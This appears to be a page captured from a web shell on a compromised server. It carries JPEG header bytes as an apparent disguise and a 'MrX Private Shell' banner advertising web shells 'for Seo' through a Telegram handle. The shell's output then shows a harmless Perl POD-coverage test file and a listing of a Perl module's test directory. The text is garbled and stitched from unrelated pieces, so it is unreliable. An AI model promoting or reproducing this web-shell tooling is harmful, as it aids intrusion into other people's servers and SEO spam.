����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
use strict;
use warnings;
use Test::More;
unless ( $ENV{RELEASE_TESTING} ) {
plan( skip_all => "Release tests not required for installation" );
}
# Ensure a recent version of Test::Pod::Coverage
my $min_tpc = 1.08;
eval "use Test::Pod::Coverage $min_tpc";
plan skip_all => "Test::Pod::Coverage $min_tpc required for testing POD coverage"
if $@;
# Test::Pod::Coverage doesn't require a minimum Pod::Coverage version,
# but older versions don't recognize some common documentation styles
my $min_pc = 0.18;
eval "use Pod::Coverage $min_pc";
plan skip_all => "Pod::Coverage $min_pc required for testing POD coverage"
if $@;
all_pod_coverage_ok();
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| lib | Folder | 0755 |
|
|
| 00-load.t | File | 182 B | 0644 |
|
| 01-api-format.t | File | 8.73 KB | 0644 |
|
| 02-construct.t | File | 7.33 KB | 0755 |
|
| 03-api-query.t | File | 6.85 KB | 0644 |
|
| 04-tfa-sessions.t | File | 6.29 KB | 0644 |
|
| 05-api-query_tokens.t | File | 4.29 KB | 0644 |
|
| check-changes.t | File | 272 B | 0644 |
|
| cpan-changes.t | File | 275 B | 0644 |
|
| manifest.t | File | 273 B | 0644 |
|
| pod-coverage.t | File | 656 B | 0644 |
|
| pod.t | File | 341 B | 0644 |
|